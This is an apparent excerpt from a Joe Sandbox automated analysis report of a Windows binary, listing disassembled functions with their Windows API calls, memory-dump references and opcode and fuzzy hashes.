                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                                                        • Opcode ID: d02faabb5e22b850afa4b68cb27a027932e2a031ad9269dcb340c7d59816618f
                                                                                                                                                                        • Instruction ID: 9b5ebec50723a524ff2148fc0054fc7f11cd98f3f7d3f316e218d648a2d0427d
                                                                                                                                                                        • Opcode Fuzzy Hash: d02faabb5e22b850afa4b68cb27a027932e2a031ad9269dcb340c7d59816618f
                                                                                                                                                                        • Instruction Fuzzy Hash: 61418F30A10219DFDB12CF58D894ABBF7F5BB45394F1442B8EA589B261CB71A862CF50
                                                                                                                                                                        Function 002F2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 002F2187
                                                                                                                                                                          • Part of subcall function 002C4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002C43AD
                                                                                                                                                                          • Part of subcall function 002C4393: GetCurrentThreadId.KERNEL32 ref: 002C43B4
                                                                                                                                                                          • Part of subcall function 002C4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002C2F00), ref: 002C43BB
                                                                                                                                                                        • GetCaretPos.USER32(?), ref: 002F219B
                                                                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 002F21E8
                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 002F21EE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2759813231-0
                                                                                                                                                                        • Opcode ID: 61ff8b7d94a8caf0f8855b6bb9672cc51d07e848dbfd2d1f0ccac690359d27c7
                                                                                                                                                                        • Instruction ID: e1ac4c33bba2b53588dfeb49a05c28cc9e891d47ed8c6914afffa75978c77298
                                                                                                                                                                        • Opcode Fuzzy Hash: 61ff8b7d94a8caf0f8855b6bb9672cc51d07e848dbfd2d1f0ccac690359d27c7
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B316171D10109AFCB04EFA9C881CAEBBFCEF58304B5044AAE515E7211DA719E95CFA0
                                                                                                                                                                        Function 002CE8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002641EA: _wcslen.LIBCMT ref: 002641EF
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002CE8E2
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002CE8F9
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002CE924
                                                                                                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 002CE92F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3763101759-0
                                                                                                                                                                        • Opcode ID: beaab2607c2f02c097e0b3bc6ef17c3b9815a733e50ba99366938225ccc116b3
                                                                                                                                                                        • Instruction ID: 6a126fbaf737b75db528308b5cfc15ed397ae2248ec7a0cfa5996303a263d0e4
                                                                                                                                                                        • Opcode Fuzzy Hash: beaab2607c2f02c097e0b3bc6ef17c3b9815a733e50ba99366938225ccc116b3
                                                                                                                                                                        • Instruction Fuzzy Hash: BD212775D11215AFDF10BFA4C982BAEB7F8EF45320F154169E804BB281D6709E61CBA1
                                                                                                                                                                        Function 002CDB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,002FDC30), ref: 002CDBA6
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002CDBB5
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 002CDBC4
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,002FDC30), ref: 002CDC21
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2267087916-0
                                                                                                                                                                        • Opcode ID: f9f1ce31d266009949f41d46e72e0eb74e9c5d3156fcd5aeecbae15e453126e1
                                                                                                                                                                        • Instruction ID: 80e290ec3d13fb4c8b8fa3e763007a1f70954cd7fd79a96e09fe9f532fe53ae1
                                                                                                                                                                        • Opcode Fuzzy Hash: f9f1ce31d266009949f41d46e72e0eb74e9c5d3156fcd5aeecbae15e453126e1
                                                                                                                                                                        • Instruction Fuzzy Hash: 8121A3301242059F8300DF24C984EABB7E8EE5A764F100B2EF499C72A1D770DE56DF82
                                                                                                                                                                        Function 002F321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 002F32A6
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002F32C0
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002F32CE
                                                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002F32DC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2169480361-0
                                                                                                                                                                        • Opcode ID: d3862e090b22129bde45e4f417994b457fc708dbe644307fe923d554eea63adc
                                                                                                                                                                        • Instruction ID: ff43e3f9939bbedd39a5fc1613134c2ed7379a4ce613de1302c21d415e9a04a7
                                                                                                                                                                        • Opcode Fuzzy Hash: d3862e090b22129bde45e4f417994b457fc708dbe644307fe923d554eea63adc
                                                                                                                                                                        • Instruction Fuzzy Hash: 3121F431215115AFD714EF24CC45F7ABB99AF81364F248268F9268B2D2C771ED91CBD0
                                                                                                                                                                        Function 002C825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002C96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,002C8271,?,000000FF,?,002C90BB,00000000,?,0000001C,?,?), ref: 002C96F3
                                                                                                                                                                          • Part of subcall function 002C96E4: lstrcpyW.KERNEL32(00000000,?,?,002C8271,?,000000FF,?,002C90BB,00000000,?,0000001C,?,?,00000000), ref: 002C9719
                                                                                                                                                                          • Part of subcall function 002C96E4: lstrcmpiW.KERNEL32(00000000,?,002C8271,?,000000FF,?,002C90BB,00000000,?,0000001C,?,?), ref: 002C974A
                                                                                                                                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,002C90BB,00000000,?,0000001C,?,?,00000000), ref: 002C828A
                                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,002C90BB,00000000,?,0000001C,?,?,00000000), ref: 002C82B0
                                                                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,002C90BB,00000000,?,0000001C,?,?,00000000), ref: 002C82EB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                        • String ID: cdecl
                                                                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                                                                        • Opcode ID: 7cfb4cc23571a6a4531d5d4f60f224e73f5c27a29d4417ed03e44d0870ffef7e
                                                                                                                                                                        • Instruction ID: 766f68a686be7a1d1422a7d08b31602439fa1af1bfa8ed9a315c4e99cb455297
                                                                                                                                                                        • Opcode Fuzzy Hash: 7cfb4cc23571a6a4531d5d4f60f224e73f5c27a29d4417ed03e44d0870ffef7e
                                                                                                                                                                        • Instruction Fuzzy Hash: 6C11D33A210282ABCB15AF38DC49E7A77A9FF45760B50812EF946C7290EF319821D791
                                                                                                                                                                        Function 002F60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 002F615A
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F616C
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F6177
                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 002F62B5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend_wcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 455545452-0
                                                                                                                                                                        • Opcode ID: 32bf3463d39605083ae6a8d2a6635170debbefa5e294b30b3cad10e123575f59
                                                                                                                                                                        • Instruction ID: e07b89953dacded627d588740fbcedfadd17a9dae46b90d311b812d9ea2fb6d0
                                                                                                                                                                        • Opcode Fuzzy Hash: 32bf3463d39605083ae6a8d2a6635170debbefa5e294b30b3cad10e123575f59
                                                                                                                                                                        • Instruction Fuzzy Hash: F511D23592021DA6DB10AF609C88AFFF7BCEB12790F104136FB0596181E7B48964CB60
                                                                                                                                                                        Function 00292079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f555d94fc610e8103c8db8f6d270b053a4464d3b5d5bbe5b476cc0a47d80373e
                                                                                                                                                                        • Instruction ID: c1dd44de221971c137cfcd792c12c44cd30b378d0067f94c7f1a4e2dbaec97ff
                                                                                                                                                                        • Opcode Fuzzy Hash: f555d94fc610e8103c8db8f6d270b053a4464d3b5d5bbe5b476cc0a47d80373e
                                                                                                                                                                        • Instruction Fuzzy Hash: 8D018FB2235216BEEE212A78BCC1F67760DDF613B8B300325B521A11D1DA608C689570
                                                                                                                                                                        Function 002C2374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 002C2394
                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002C23A6
                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002C23BC
                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002C23D7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                        • Opcode ID: 38db583cc8a81794e641aff3bb831294a611669322a478686b404ee610aa6797
                                                                                                                                                                        • Instruction ID: 9bd6336afed75cbaec3fa451a810054f8d644f349b4e8fda084d250575b01886
                                                                                                                                                                        • Opcode Fuzzy Hash: 38db583cc8a81794e641aff3bb831294a611669322a478686b404ee610aa6797
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B11093A900219FFEB11DBA5CD85F9DFB78FB08750F200195EA01B7290DA716E54DB94
                                                                                                                                                                        Function 002CEAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002CEB14
                                                                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 002CEB47
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002CEB5D
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002CEB64
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2880819207-0
                                                                                                                                                                        • Opcode ID: 7821b5a4d10ed6d4fdd01c3e28ac8357bc2cae44dc741d5faf121a25e35e6267
                                                                                                                                                                        • Instruction ID: 6f51730a679b737515bc2386f7c8d3c83517cc8ae34bc36f33cce3d521de8135
                                                                                                                                                                        • Opcode Fuzzy Hash: 7821b5a4d10ed6d4fdd01c3e28ac8357bc2cae44dc741d5faf121a25e35e6267
                                                                                                                                                                        • Instruction Fuzzy Hash: D2112F759102157BCB019F68AC4AFAF7F6DAB45374F014359F415D32D0D6748D0487A0
                                                                                                                                                                        Function 0028D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateThread.KERNEL32(00000000,?,0028D369,00000000,00000004,00000000), ref: 0028D588
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0028D594
                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0028D59B
                                                                                                                                                                        • ResumeThread.KERNEL32(00000000), ref: 0028D5B9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 173952441-0
                                                                                                                                                                        • Opcode ID: 4b04b2e41e4b3024767336d8441b5b2b480c422431f37034191f9e5b6576356b
                                                                                                                                                                        • Instruction ID: d331a92e594fe8bd799ced4210fe2e13b5cf0ba644bd5089d105dd956b1e3734
                                                                                                                                                                        • Opcode Fuzzy Hash: 4b04b2e41e4b3024767336d8441b5b2b480c422431f37034191f9e5b6576356b
                                                                                                                                                                        • Instruction Fuzzy Hash: A901DB7A432115BBDB107F65EC09BAA7B6DEF41335F100216F525861D0DB708928DBA1
                                                                                                                                                                        Function 00267873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002678B1
                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 002678C5
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 002678CF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3970641297-0
                                                                                                                                                                        • Opcode ID: 9fa6b2c85b7000b494bec2180400f4614a28c492cf36d38e09f24b8c66894442
                                                                                                                                                                        • Instruction ID: a280bf7567b8f942839ec45bbdeb31b3ad059741075842bf9a9406370b159884
                                                                                                                                                                        • Opcode Fuzzy Hash: 9fa6b2c85b7000b494bec2180400f4614a28c492cf36d38e09f24b8c66894442
                                                                                                                                                                        • Instruction Fuzzy Hash: 5811AD72515109BFDF025F90EC58EEABB69FF097A8F040125FA0456120D731DCA0FBA0
                                                                                                                                                                        Function 002933E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0029338D,00000364,00000000,00000000,00000000,?,002935FE,00000006,FlsSetValue), ref: 00293418
                                                                                                                                                                        • GetLastError.KERNEL32(?,0029338D,00000364,00000000,00000000,00000000,?,002935FE,00000006,FlsSetValue,00303260,FlsSetValue,00000000,00000364,?,002931B9), ref: 00293424
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0029338D,00000364,00000000,00000000,00000000,?,002935FE,00000006,FlsSetValue,00303260,FlsSetValue,00000000), ref: 00293432
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                                        • Opcode ID: 693f4309420697702b958a1a6ab7c7088a9a345c7bc191365905ab5fc6b21ae0
                                                                                                                                                                        • Instruction ID: 74d5e0e165096e213c2160f030cf8cb7ab34ebd64198c1d1910d5de44f54de2b
                                                                                                                                                                        • Opcode Fuzzy Hash: 693f4309420697702b958a1a6ab7c7088a9a345c7bc191365905ab5fc6b21ae0
                                                                                                                                                                        • Instruction Fuzzy Hash: 530184366712279BCF23CF79AC489677B99AF45BB1B221630F90AD7181D720D911C6E0
                                                                                                                                                                        Function 002CBA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,002CB69A,?,00008000), ref: 002CBA8B
                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,002CB69A,?,00008000), ref: 002CBAB0
                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,002CB69A,?,00008000), ref: 002CBABA
                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,002CB69A,?,00008000), ref: 002CBAED
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
